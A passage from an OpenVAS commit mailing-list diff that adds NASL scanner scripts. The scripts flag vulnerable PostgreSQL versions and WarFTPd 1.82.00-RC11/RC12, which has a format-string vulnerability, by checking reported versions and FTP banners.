+}
+
+include("misc_func.inc");
+include("version_func.inc");
+
+port = get_kb_item("Services/postgresql");
+if(!port)port = 5432;
+if(!get_tcp_port_state(port))exit(0);
+
+if(!ver = get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")))exit(0);
+
+if(
+    version_in_range(version:ver, test_version:"8.4", test_version2:"8.4.0")  ||
+    version_in_range(version:ver, test_version:"8.3", test_version2:"8.3.7")  ||
+    version_in_range(version:ver, test_version:"8.2", test_version2:"8.2.13") ||
+    version_in_range(version:ver, test_version:"8.1", test_version2:"8.1.17") ||
+    version_in_range(version:ver, test_version:"8.0", test_version2:"8.0.21") ||
+    version_in_range(version:ver, test_version:"7.4", test_version2:"7.4.25") 
+  )
+{
+     security_warning(port:port);
+     exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/warftpd_20944.nasl
===================================================================
--- trunk/openvas-plugins/scripts/warftpd_20944.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/warftpd_20944.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,99 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WarFTPD Multiple Format String Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100282);
+ script_bugtraq_id(20944);
+ script_cve_id("CVE-2006-5789");
+ script_version ("1.0-$Revision$");
+
+ script_name("WarFTPD Multiple Format String Vulnerabilities");
+
+desc = "Overview:
+WarFTPd is prone to multiple remote format-string vulnerabilities
+because the application fails to sanitize user-supplied input before
+passing it to a formatted-output function.
+
+An attacker can exploit these issues to crash the server and possibly
+to execute arbitrary code within the context of the server, but this
+has not been confirmed.
+
+WarFTPd 1.82.00-RC11 is reported vulnerable; prior versions may be
+vulnerable as well.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/20944
+http://support.jgaa.com/index.php?MenuPage=product
+http://www.securityfocus.com/archive/1/506443
+http://www.securityfocus.com/archive/1/450804
+
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if WarFTPd version is WarFTPd 1.82.00-RC11");
+ script_category(ACT_GATHER_INFO);
+ script_family("FTP");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+include("version_func.inc");
+
+port = get_kb_item("Services/ftp");
+if(!port){
+  port = 21;
+}
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+
+if(!get_port_state(port)){
+  exit(0);
+}
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+banner =  ftp_recv_line(socket:soc);
+if(!banner)exit(0);
+
+if(!version = eregmatch(string: banner, pattern:"WarFTPd ([0-9.]+[-RC0-9]*)"))exit(0);
+version[1] = ereg_replace(pattern:"-", string:version[1], replace:".");
+
+if(version_is_equal(version: version[1], test_version:"1.82.00.RC11") ||
+   version_is_equal(version: version[1], test_version:"1.82.00.RC12")) {	
+      security_warning(port:port);
+      exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/warftpd_20944.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision



More information about the Openvas-commits mailing list